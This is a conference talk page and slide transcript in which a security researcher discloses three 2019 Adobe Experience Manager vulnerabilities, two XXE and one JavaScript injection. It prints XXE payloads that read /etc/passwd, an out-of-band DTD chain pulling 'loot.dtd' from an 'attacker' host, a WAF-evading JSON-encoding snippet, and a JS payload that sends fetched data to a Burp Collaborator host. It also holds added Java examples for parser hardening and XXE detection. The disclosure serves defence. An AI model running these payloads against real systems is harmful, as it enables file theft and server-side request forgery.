A Hacker's perspective on AEM applications security

Adobe Experience Manager (AEM) is a comprehensive content management solution for building websites and managing marketing content and assets. I started to look into AEM security back in 2015. Since then I have discovered and reported several server-side vulnerabilities and developed a toolset for AEM hacking to automate security testing of AEM web applications.

In 2019 I reported one code injection and three XML external entity (XXE) vulnerabilities to Adobe PSIRT. They are known as CVE-2019-8086, CVE-2019-8087 and CVE-2019-8088. These vulnerabilities allow anonymous attackers to compromise an AEM web application.

In the talk, I will disclose details of discovered vulnerabilities and exploitation techniques.


Mikhail Egorov

September 30, 2020

Transcript

  1. EUROPE'S LEADING AEM DEVELOPER CONFERENCE 28th – 30th SEPTEMBER 2020
     A Hacker's perspective on AEM applications security
     Mikhail Egorov, Security researcher & bug hunter

  2. Intro

  3. whoami
     ▪ Security researcher & full-time bug hunter
     ▪ https://bugcrowd.com/0ang3el
     ▪ https://hackerone.com/0ang3el
     ▪ Conference speaker
     ▪ https://www.slideshare.net/0ang3el
     ▪ https://speakerdeck.com/0ang3el

  4. whoami
     ▪ Toolset for AEM hacking
     ▪ https://github.com/0ang3el/aem-hacker

  5. APSB19-48

  6. APSB19-48
     ▪ http://helpx.adobe.com/security/products/experience-manager/apsb19-48.html
     ▪ CVE-2019-8086 / XML eXternal Entity Injection
     ▪ CVE-2019-8087 / XML eXternal Entity Injection
     ▪ CVE-2019-8088 / JavaScript Code Injection

  7. XML eXternal Entity (XXE) attacks
     ▪ Do we see the parsed XML?
     ▪ What’s allowed by the XML parser?
       ▪ General external entities
       ▪ Parameter external entities
       ▪ External DTD loading

  8. XML eXternal Entity (XXE) attacks
     <?xml version="1.0" encoding="UTF-8"?>
     <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
     <foo>&xxe;</foo>

     Result:
     <foo>root:x:0:0:root:/root:/bin/bash
     daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
     bin:x:2:2:bin:/bin:/usr/sbin/nologin
     sys:x:3:3:sys:/dev:/usr/sbin/nologin
     sync:x:4:65534:sync:/bin:/bin/sync
     …
     </foo>

  9. XML eXternal Entity (XXE) attacks
     <?xml version="1.0" encoding="UTF-8"?>
     <!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://127.0.0.1:4503"> %xxe; ]>
     <foo></foo>

  10. XML eXternal Entity (XXE) attacks
     <?xml version="1.0" encoding="UTF-8"?>
     <!DOCTYPE foo SYSTEM "http://127.0.0.1:4503" []>
     <foo></foo>
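Slides 7 to 10 list the three parser capabilities an XXE payload relies on: general external entities, parameter external entities and external DTD loading. The following Java class is an added example (not code from the talk, nor from AEM or Adobe) showing how a servlet that must parse untrusted XML can configure the JDK's built-in DocumentBuilderFactory so that all three DOCTYPE shapes from those slides are rejected, while plain XML without a DOCTYPE still parses. The class name, the sample inputs and the decision to reject any DOCTYPE outright are assumptions of this example; the feature URIs are the standard Xerces/SAX ones.

```java
import java.io.IOException;
import java.io.StringReader;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;

public class HardenedXmlParser {

    // Builds a parser that cannot resolve general entities, parameter entities
    // or an external DTD. The first feature rejects any DOCTYPE declaration,
    // which covers all three slide payloads; the rest are defence in depth for
    // parser implementations that ignore that feature.
    static DocumentBuilder newHardenedBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        dbf.setXIncludeAware(false);
        dbf.setExpandEntityReferences(false);
        try {
            // JAXP 1.5 properties: an empty value forbids every protocol.
            dbf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
            dbf.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
        } catch (IllegalArgumentException e) {
            // Older or third-party parsers may not know these attributes;
            // the feature flags above still apply.
        }
        return dbf.newDocumentBuilder();
    }

    // Parses untrusted XML with the hardened builder. Returns the document,
    // or null when the parser rejected the input (DOCTYPE present, etc.).
    static Document parseUntrusted(String xml) throws ParserConfigurationException {
        try {
            return newHardenedBuilder().parse(new InputSource(new StringReader(xml)));
        } catch (SAXException | IOException e) {
            System.out.println("rejected: " + e.getMessage());
            return null;
        }
    }

    public static void main(String[] args) throws Exception {
        // Constructed inputs mirroring the DOCTYPE shapes on slides 8, 9 and 10,
        // plus one benign document without a DOCTYPE.
        String generalEntity = "<?xml version=\"1.0\"?><!DOCTYPE foo "
                + "[<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><foo>&xxe;</foo>";
        String parameterEntity = "<?xml version=\"1.0\"?><!DOCTYPE foo "
                + "[<!ENTITY % xxe SYSTEM \"http://127.0.0.1:4503\"> %xxe;]><foo></foo>";
        String externalDtd = "<?xml version=\"1.0\"?>"
                + "<!DOCTYPE foo SYSTEM \"http://127.0.0.1:4503\" []><foo></foo>";
        String benign = "<?xml version=\"1.0\"?><afData><name>ok</name></afData>";

        for (String xml : new String[] {generalEntity, parameterEntity, externalDtd, benign}) {
            Document doc = parseUntrusted(xml);
            System.out.println(doc == null
                    ? "blocked"
                    : "parsed, root element = " + doc.getDocumentElement().getTagName());
        }
    }
}
```

With disallow-doctype-decl enabled the first three inputs fail at the DOCTYPE before any entity is resolved, so no file read and no connection to port 4503 happens; the benign document parses with root element afData. The same configuration also stops the parameter-entity chain used against the WSDL parser on slides 28 and 29, because the DTD is never fetched.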
  11. CVE-2019-8086
     ▪ GuideInternalSubmitServlet
       @Service({Servlet.class})
       @Properties({
           @Property(name = "sling.servlet.resourceTypes", value = {"fd/af/components/guideContainer"}),
           @Property(name = "sling.servlet.methods", value = {"POST"}),
           @Property(name = "sling.servlet.selectors", value = {"af.internalsubmit"})
       })
       public class GuideInternalSubmitServlet …

  12. CVE-2019-8086

  13. CVE-2019-8086

  14. CVE-2019-8086
     ▪ XXE payload
       <?xml version="1.0" encoding="utf-8"?>
       <!DOCTYPE afData [ <!ENTITY a SYSTEM "file:///etc/passwd"> ]>
       <afData>&a;</afData>

  15. CVE-2019-8086

  16. CVE-2019-8086
     ▪ Exploitation hints
     ▪ We can JSON-encode the XXE payload to bypass a WAF
     ▪ In Java we can list directory content
       ▪ /proc/self/cwd

  17. CVE-2019-8086
     ▪ JSON-encoding
       data = '<?xml version="1.0" encoding="utf-8"?><!DOCTYPE afData [<!ENTITY a SYSTEM "file:///etc/passwd">]><afData>&a;</afData>'
       result = ""
       for c in data:
           result = result + "\\u00%02x" % ord(c)
       print(result)
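Slide 16 and slide 17 make a point that matters on the defending side as well: a filter that matches `<!DOCTYPE` or `<!ENTITY` on the raw request body misses the same payload once every character is sent as a JSON `\u00XX` escape, because the JSON layer decodes it only after the filter has run. The class below is an added example (not from the talk, not part of AEM or any WAF product) of the check a request filter or detection rule should make: undo JSON string escapes first, then look for the DOCTYPE markers in both the raw and the decoded text. The marker list, the decoder and the class name are assumptions of this example; the sample body is constructed with the same transformation as the slide's Python snippet.

```java
import java.util.regex.Pattern;
import java.util.stream.Collectors;

public class XmlMarkerDetector {

    // Assumed marker list: a DOCTYPE, an entity declaration, or a SYSTEM/PUBLIC
    // identifier that points at an external resource.
    private static final Pattern XXE_MARKERS = Pattern.compile(
            "<!DOCTYPE|<!ENTITY|SYSTEM\\s*[\"']|PUBLIC\\s*[\"']", Pattern.CASE_INSENSITIVE);

    // True if all four characters are hex digits (the payload of a backslash-u escape).
    private static boolean isHex4(String s, int from) {
        for (int k = from; k < from + 4; k++) {
            if (Character.digit(s.charAt(k), 16) < 0) {
                return false;
            }
        }
        return true;
    }

    // Decodes JSON string escapes: backslash-u with four hex digits, and the
    // escaped quote, backslash and slash. Anything malformed is kept verbatim
    // so that a broken escape cannot hide a marker by aborting the decoder.
    static String unescapeJson(String s) {
        StringBuilder out = new StringBuilder(s.length());
        int i = 0;
        while (i < s.length()) {
            char c = s.charAt(i);
            if (c == '\\' && i + 1 < s.length()) {
                char n = s.charAt(i + 1);
                if (n == 'u' && i + 5 < s.length() && isHex4(s, i + 2)) {
                    out.append((char) Integer.parseInt(s.substring(i + 2, i + 6), 16));
                    i += 6;
                    continue;
                } else if (n == '"' || n == '\\' || n == '/') {
                    out.append(n);
                    i += 2;
                    continue;
                }
            }
            out.append(c);
            i++;
        }
        return out.toString();
    }

    // The check a filter should perform: inspect the body as received and
    // again after undoing JSON escapes.
    static boolean containsXxeMarkers(String body) {
        return XXE_MARKERS.matcher(body).find()
                || XXE_MARKERS.matcher(unescapeJson(body)).find();
    }

    // Same transformation as the slide's Python snippet, generalised to four
    // hex digits so it also covers characters above 0xFF. Used to build the sample.
    static String jsonUnicodeEncode(String s) {
        return s.chars()
                .mapToObj(ch -> String.format("\\u%04x", ch))
                .collect(Collectors.joining());
    }

    public static void main(String[] args) {
        // Constructed sample: the slide 14 payload, raw and fully escaped,
        // plus a benign JSON body that contains XML but no DOCTYPE.
        String raw = "<?xml version=\"1.0\" encoding=\"utf-8\"?><!DOCTYPE afData "
                + "[<!ENTITY a SYSTEM \"file:///etc/passwd\">]><afData>&a;</afData>";
        String encoded = jsonUnicodeEncode(raw);
        String benign = "{\"afData\":\"<afData><name>ok<\\/name><\\/afData>\"}";

        System.out.println("raw body     flagged: " + containsXxeMarkers(raw));
        System.out.println("escaped body flagged: " + containsXxeMarkers(encoded));
        System.out.println("benign body  flagged: " + containsXxeMarkers(benign));
    }
}
```

Matching on the raw body alone flags only the first sample; matching after unescapeJson flags the escaped one too and still leaves the benign body alone. The same normalisation applies to logs: store or index the decoded form of JSON request bodies, otherwise a search for DOCTYPE after an incident will not find an encoded payload either.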
  18. CVE-2019-8086

  19. CVE-2019-8086
     ▪ XXE payload
       <?xml version="1.0" encoding="utf-8"?>
       <!DOCTYPE afData [ <!ENTITY a SYSTEM "file:///etc"> ]>
       <afData>&a;</afData>

  20. CVE-2019-8086

  21. CVE-2019-8086
     ▪ Exploitation requirements
     ▪ There should be a node with fd/af/components/guideContainer resource type
       ▪ property=sling:resourceType&property.value=fd/af/components/guideContainer
     ▪ Attacker should have jcr:write access somewhere
       ▪ /content/usergenerated/etc/commerce/smartlists/

  22. CVE-2019-8086
     ▪ Exploitation requirements
     ▪ Doesn’t work equally on different AEM versions
     ▪ Only blind SSRF for some versions
       <?xml version="1.0" encoding="utf-8"?>
       <!DOCTYPE afData SYSTEM "http://localhost:4503" []>
       <afData></afData>

  23. CVE-2019-8087
     ▪ WSDLInvokerServlet
       @Service({Servlet.class})
       @Properties({
           @Property(name = "sling.servlet.resourceTypes", value = {"fd/af/components/guideContainer"}),
           @Property(name = "sling.servlet.selectors", value = {"af.wsdl"}),
           @Property(name = "sling.servlet.methods", value = {"POST"})
       })
       public class WSDLInvokerServlet …

  24. CVE-2019-8087

  25. CVE-2019-8087

  26. CVE-2019-8087
     ▪ WSDL example
     ▪ https://cs.au.dk/~amoeller/WWW/webservices/wsdlexample.html

  27. CVE-2019-8087

  28. CVE-2019-8087
     ▪ Malicious xxe.wsdl
       <?xml version="1.0"?>
       <!DOCTYPE definitions [
         <!ENTITY % dtd SYSTEM "http://attacker:1337/loot.dtd">
         %dtd;
         %param1;
       ]>
       <definitions name="StockQuote" …
         <operation name="GetLastTradePrice">
           <soap:operation soapAction="&internal;"/>
         …

  29. CVE-2019-8087
     ▪ Malicious loot.dtd
       <!ENTITY % payload SYSTEM "file:///etc/passwd">
       <!ENTITY % param1 "<!ENTITY internal '%payload;'>">

  30. CVE-2019-8087

  31. CVE-2019-8087
     ▪ Exploitation requirements
     ▪ There should be a node with fd/af/components/guideContainer resource type
       ▪ property=sling:resourceType&property.value=fd/af/components/guideContainer
     ▪ Attacker should have jcr:write access somewhere
       ▪ /content/usergenerated/etc/commerce/smartlists/

  32. CVE-2019-8087
     ▪ Exploitation requirements
     ▪ Doesn’t work equally on different AEM versions
     ▪ On some AEM versions WSDLInvokerServlet is not present

  33. CVE-2019-8088
     ▪ GuideSubmitServlet
       @Service({Servlet.class})
       @Properties({
           @Property(name = "sling.servlet.resourceTypes", value = {"fd/af/components/guideContainer"}),
           @Property(name = "sling.servlet.methods", value = {"POST"}),
           @Property(name = "sling.servlet.selectors", value = {"af.submit", "af.agreement", "af.signSubmit"})
       })
       public class GuideSubmitServlet extends SlingAllMethodsServlet { …

  34. CVE-2019-8088

  35. CVE-2019-8088

  36. CVE-2019-8088

  37. CVE-2019-8088

  38. CVE-2019-8088

  39. CVE-2019-8088
     ▪ Sandboxed Rhino engine on some AEM versions
       ▪ No RCE
       ▪ Sandbox allows network interactions
       ▪ SSRF w/ ability to see the response

  40. CVE-2019-8088
     ▪ JS payload
       ');jQuery.get('http://727a14ifhq8on9vakssk6agtlkrafz.burpcollaborator.net');//

  41. CVE-2019-8088

  42. CVE-2019-8088

  43. CVE-2019-8088
     ▪ JS payload
       ');jQuery.get('http://727a14ifhq8on9vakssk6agtlkrafz.burpcollaborator.net',function(data){jQuery.get('http://727a14ifhq8on9vakssk6agtlkrafz.burpcollaborator.net',{loot:data})});//

  44. CVE-2019-8088

  45. CVE-2019-8088

  46. CVE-2019-8088
     ▪ Exploitation requirements
     ▪ There should be a node with fd/af/components/guideContainer resource type
       ▪ property=sling:resourceType&property.value=fd/af/components/guideContainer
     ▪ Attacker should have jcr:write access somewhere
       ▪ /content/usergenerated/etc/commerce/smartlists/

  47. CVE-2019-8088
     ▪ Exploitation requirements
     ▪ Doesn’t work equally on different AEM versions
     ▪ RCE or SSRF

  48. APSB19-48
     ▪ Keep AEM up to date
       ▪ http://helpx.adobe.com/security/products/experience-manager/apsb19-48.html
     ▪ Block jcr:write access for anonymous user
       ▪ /content/usergenerated/etc/commerce/smartlists/
     ▪ Remove demo content (Geometrixx, WeRetail, …)

  49. Thank you @0ang3el